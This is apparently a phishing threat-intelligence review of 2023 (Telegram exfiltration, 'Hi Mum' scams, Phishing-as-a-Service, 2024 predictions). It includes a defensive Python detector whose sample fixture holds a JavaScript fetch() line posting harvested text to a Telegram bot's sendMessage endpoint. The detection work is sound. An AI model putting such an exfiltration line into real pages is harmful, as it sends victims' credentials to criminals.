Throughout 2023, The WMC Global threat intelligence team remained steadfast in safeguarding users and clients against the relentless tide of credential phishing threats. As we bid farewell to the year, we reflect on significant events, emerging trends, and observed shifts in threat actor behavior and predict threat landscape highlights for the year ahead.
2023: The Year of Telegram - Among the varied exfiltration methods, Telegram has risen to prominence in the threat actor's playbook. As we delve into the intricacies of phishing in 2023, we'll explore how cybercriminals have exploited Telegram. The blog will unravel the methods used by malicious threat actors on this platform and examine the implications for users.
“Hi Mum” Scams – 2023 witnessed the rise of "Hi Mum" family scams in the UK, a tactic that preys on the emotions of unsuspecting individuals to drive them to a desired action. These scams, masquerading as heartwarming messages from loved ones, aim to deceive recipients into sending money to threat actors. This summary of our investigation will explore the working methods of the scams and detail how WMC Global fought back.
PhishFeed Stat Wrap-Up - No discussion on the state of phishing would be complete without a comprehensive statistical analysis. The blog will provide a detailed wrap-up of the PhishFeed statistics for 2023, highlighting key trends and notable campaign tactics. By dissecting these statistics, readers will gain a deeper understanding of the ever-changing landscape and be well equipped for 2024.
Phishing as a Service (PaaS) - A term that has gained prominence in recent times, "Phishing as a Service" is an offering that waxes and wanes in popularity with threat actors. As threat actors always explore easier and quicker solutions to monetization, PaaS offerings have taken a foothold in the cybercrime marketplace as an efficient and cheap way to run a phishing operation. We'll review the mechanics of these services, examining how they operate, their impact on cybersecurity, and the challenges and advantages they pose to defenders.
2023: The Year of Telegram
Released in 2013, Telegram is not a new service. However, in the past year WMC Global has seen a significant increase in threat actors solely using Telegram bots at scale as a phishing kit exfiltration method. Last year became the pivotal point where all new observed kits employed Telegram, forgoing other methods. Notably, some Phishing as a Service offerings now allow threat actors to select Telegram as a victim notification method as they are adapting to their customers’ needs.
Alongside the growth of Telegram, WMC Global witnessed the growth in abuse of legitimate services. Services like Google’s WebApp, Firebase, and Heroku have been used to host phishing by threat actors for many years, but because these platforms do not allow PHP processing to occur, threat actors are required to use JavaScript exfiltration methods. The main exfiltration method is using JavaScript to POST credentials to Telegram directly from these services. Another method is using compromised sites to host a PHP page. The threat actor then makes a POST to this PHP script which can execute and exfiltrate the details in a more traditional way. Often, this exfiltration still routes to Telegram.
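The JavaScript-to-Telegram exfiltration pattern described above leaves a recognisable fingerprint in captured landing-page source that defenders can triage on. The following is an added Python example, not WMC Global or PhishFeed code; it assumes the public Telegram Bot API URL shape (`api.telegram.org/bot<token>/<method>`) and runs over a constructed page fragment rather than a real kit.

```python
"""Added example: flag Telegram Bot API exfiltration in phishing page source.

Hypothetical triage helper for defenders reviewing landing pages hosted on
static services (no PHP), where a kit POSTs harvested credentials straight to a
Telegram bot. The regexes target the public Bot API URL shape and chat_id
parameters; the bot id and chat_id are what a takedown/abuse report needs.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# <bot_id>:<secret>/<method>, e.g. .../bot123456:AAE.../sendMessage
BOT_URL_RE = re.compile(
    r"https?://api\.telegram\.org/bot(\d{6,}:[A-Za-z0-9_-]{30,})/(\w+)", re.I)
# chat_id as JSON key, JS property or form field; keep the sign (group chats are negative)
CHAT_ID_RE = re.compile(r"chat_id[\s\"':=]{0,4}(-?\d{5,})", re.I)
# Obfuscated kits sometimes assemble the host from string fragments; flag that too.
SPLIT_HOST_RE = re.compile(r"api\W{0,6}telegram\W{0,6}org", re.I)

# Constructed sample page fragment (not a real kit): a login handler posting to a bot.
SAMPLE_PAGE = (
    "<script>var u='https://api.telegram.org/bot123456789:"
    "AAExampleToken_0123456789abcdefghij/sendMessage';"
    "fetch(u,{method:'POST',body:JSON.stringify({chat_id:-1001234567890,text:t})});"
    "</script>"
)

@dataclass
class TelegramExfil:
    bot_token: str
    method: str
    chat_id: Optional[str]

def find_telegram_exfil(page_source: str) -> List[TelegramExfil]:
    """Return one record per Bot API call found, paired with the nearest chat_id."""
    hits = []
    for m in BOT_URL_RE.finditer(page_source):
        after = CHAT_ID_RE.search(page_source, m.end()) or CHAT_ID_RE.search(page_source)
        hits.append(TelegramExfil(m.group(1), m.group(2), after.group(1) if after else None))
    return hits

def looks_like_telegram_exfil(page_source: str) -> bool:
    """Cheap yes/no triage check that also catches hosts built from fragments."""
    return bool(BOT_URL_RE.search(page_source) or SPLIT_HOST_RE.search(page_source))

def mask_token(token: str) -> str:
    """Keep the bot id (before the colon) for reporting; hide most of the secret."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:4]}..."

if __name__ == "__main__":
    for hit in find_telegram_exfil(SAMPLE_PAGE):
        print(mask_token(hit.bot_token), hit.method, hit.chat_id)
```

The masked bot id is enough for Telegram to act on an abuse report, and the chat_id links multiple landing pages that feed the same operator.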
“Hi Mum” Scams
The “Hi Mum” family scams, seen first in the UK, are a simple evolution of the more traditional romance-based campaigns. In these scams, threat actors attempt to gain trust and create urgency by impersonating a person's child in need of help. WMC Global has seen no advanced tactics employed in these campaigns: threat actors send mass text messages to sequential numbers, unaware of who they are messaging, and no spear phishing or targeting appears to be conducted. Threat actors are simply hoping the recipient is a parent and that they do not question the sender's authenticity as their child.
Last year these scams spread globally, appearing in mainland Europe, the US, and Australia. We suspect the vast majority of these campaigns are run by sole threat actors who purchase spam lists and use SIM boxes or online Communications Platform as a Service (CPaaS) providers to mass-text users. Most then move the conversation onto WhatsApp to continue engaging with potential victims. They test the potential victim initially by encouraging them to pay a small amount of money for a manufactured scenario, such as helping fix their phone or repaying a debt. If the requested money is paid, the threat actor will continue to hound the victim for further funds.
The WMC Global threat intelligence team engaged in an initiative with law enforcement to help disrupt these scammers which resulted in multiple arrests. This is an ideal outcome and demonstrates no platform or technique is guaranteed safe or foolproof for threat actors.
PhishFeed Wrap-Up
PhishFeed is WMC Global’s proprietary phishing feed. With millions of ingested URLs, PhishFeed is a source of unique, valuable and useful IoCs which brands and organizations use to detect, block, and investigate phishing campaigns targeting their companies.
Mobile Phishing Data
Figure 1: Percentage of mobile vs. non-mobile phishing campaigns
Mobile phishing campaign data is WMC Global’s specialty and a sizeable part of WMC Global’s overall intelligence data, uniquely positioning us to provide dedicated expertise and valued insight into SMS phishing campaigns through PhishFeed.
As with any intelligence feed, WMC Global’s visibility is unique and based upon our own proprietary ingested data. Figure 1, above, illustrates a rich feed of mobile phishing, showing that mobile campaigns are not slowing down and pose a large threat to organizations. With an understanding of each provider’s collection methodology, organizations can combine multiple feeds from different viewpoints to build a better overall view of the threat landscape.
Over 66% of PhishFeed's collected data for 2023 was linked to mobile campaigns, emphasizing how WMC Global’s data visibility is weighted towards this. The WMC Global threat intelligence team asserts this measurement is not a representation of the percentage of phishing campaigns which are operated over SMS but is more a reflection on WMC Global’s data bias.
Figure 2: Brands commonly targeted with phishing attacks
WMC Global identifies and brands all phishing URLs ingested into PhishFeed. Branding the URLs allows the threat intelligence team to classify phishing campaign trends across various sectors, as well as track campaign volumes over time. Figure 2 illustrates which brands have been impacted by the largest campaigns and which brands have been most consistently targeted, with the United States Postal Service (USPS) being particularly hard hit.
Figure 3: Web hosting services popular with threat actors
A constant battle for threat actors is where to host their phishing campaigns. If a scammer uses a dedicated domain, they need to find one that is for sale, within budget, and with a name that relates to the campaign they plan to run. If the threat actor uses a compromised host, they either need to buy this access or compromise the host themselves. Not only does this process take time, but threat actors may lose access if the server or site is updated. Threat actors can also use user-content hosting services. While these sites may avoid the previously noted challenges, most of these offerings do not offer PHP processing, forcing threat actors to find other ways to exfiltrate data. WMC Global witnessed multiple websites routinely used to host phishing. As shown in Figure 3 above, threat actors spread out their landing pages across different web hosting services with many websites seeming equally popular.
Phishing as a Service
Phishing as a Service (PaaS) is not new, but throughout 2023 WMC Global observed a large shift from threat actors running live puppeteer kits (a major trend in previous years) to relying on these service offerings, either to perform automated analysis or to act as the admin panel. Puppeteer kits had a major detection weakness: every phishing site had to be centrally connected to an admin panel on the same host, so if the site went down, the controlling threat actor lost any harvested credentials. In contrast, if a site is taken down while using a third-party service, not only can the threat actor spin up another site, but these services allow a single login to the admin panel for control over multiple phishing domains and campaigns, depending on the sophistication of the PaaS.
PaaS might seem like the silver bullet for threat actors; however, it comes with one major drawback. All the phishing kits that a PaaS provider offers are usually built by the same threat actor, greatly simplifying detection because the resources are shared across kits. These services aim to have the largest collection of sites possible, and frequently that means kits are created in rapid succession, resulting in few alterations and almost no built-in defenses to evade detection. PaaS offerings also create a single point of failure, and law enforcement has dedicated more time to targeting and taking down these operations. That single point of failure lets law enforcement disrupt multiple phishing campaigns at once and target both the PaaS operators and the operators of the phishing sites. The latter can be identified more easily because PaaS services gather information on their users.
Predictions for 2024
Seeing into the future is always difficult; however, WMC Global’s unique insight into SMS data and specialism in credential phishing put us in a good position to make some well-researched and strong predictions for the next 12 months of threat actor activity.
Large-Scale Is Better Than Small-Scale
Throughout the last few years there has been a noticeable decrease in large-scale SIM box campaigns. The main campaigns the threat intelligence team witnessed were smaller, concentrated operations targeting local entities unique to a specific geographic region. However, recently WMC Global has seen evidence that threat actors are moving back to indirect targeting, or mass smishing, a mobile phishing method in which a threat actor sends a large volume of SMS messages to millions of phones using a generic or larger organization as the lure. This shift could be a deliberate change of tactics to secure a higher yield from victims, since media coverage of attack campaigns and trends is not always aligned with the true threat picture; or it might reflect a changing threat actor landscape, with new threat actors wanting to try different tactics, unaware they are replicating the same tactics, techniques, and procedures (TTPs) observed a couple of years prior.
More Indirect Targeting
As more banks and institutions implement more advanced fraud detection capabilities, WMC Global predicts threat actors will move away en masse from direct targeting of bank accounts and shift to more sophisticated social engineering tactics. We have already seen evidence of these campaigns, but WMC Global threat analysts believe they will only increase throughout the year as threat actors work to bypass the fraud detection in place. Banks are making it harder for threat actors to gain unauthorized access to a victim's account without being detected. Threat actors believe that socially engineering a victim into transferring their own funds lets them evade detection more easily, and once they control the money they can move it into other accounts, across borders, and cash out in numerous ways.
Targeting middle parties such as supply chains, which might lack the threat detection, URL blocking, and mitigation resources to protect against on-going and large-scale phishing campaigns, could allow more victims to fall for the sites. Additionally, brands have a much lower incentive to invest in shutting down phishing sites if they are not themselves losing money from a campaign that uses their brand as a lure. Package delivery companies, for example, are widely used as phishing lures but do not directly lose money from the campaigns, so there is much less incentive to shut the sites down. Meanwhile, the banks that incur the financial loss cannot police the whole internet and act against every phishing site.
Is AI the Future?
In the last quarter of 2023, AI became more accessible to the general public, and the level of sophistication, public awareness, and governmental scrutiny of AI increased tenfold. WMC Global has seen many companies state that AI poses a threat to security and that it will benefit threat actors in the delivery and setup of their campaigns. WMC Global threat analysts believe threat actors will optimize their campaign configurations by using AI to generate phishing lure emails and text messages, eliminating the misspellings and inconsistent language that have been easy tells in the past. However, this does not pose a huge additional risk to users: threat actors have varying levels of language fluency, and many campaigns sent without AI are already written in the perfect vernacular. AI will play a part in assisting threat actors; however, it is almost impossible for threat intelligence companies to say with any confidence whether AI was used in a given campaign. On the other hand, the WMC Global threat intelligence team believes that threat actors will look to employ AI to automate more of their campaign workflows. We might start seeing automated campaigns that use AI to deliver live chat, or adaptable pages that change based upon a user's input. This could be detectable, since the page code would need to call an AI API to feed data into a model and then use the reply to change or adapt the phishing site.
AI will continue to be a focal point for organizations at every level: governments ensuring development is safe and controlled, companies looking to use AI to enhance their security posture and detection capabilities, and threat actors trying to use it to enrich their campaigns, gather more victims, and increase their monetary gains.
Looking Ahead
The rapid advancements in technology, and especially AI, suggest threat actor methodologies will become increasingly challenging to combat in 2024 and beyond. Threat intelligence teams must stay alert to trends, creative in their approaches to detection, and proactive towards any unusual patterns they discover in order to stay ahead of scammers in a volatile environment. As market needs evolve, WMC Global remains at the ready, monitoring the environment for any fluctuations and adapting to best protect users and clients alike.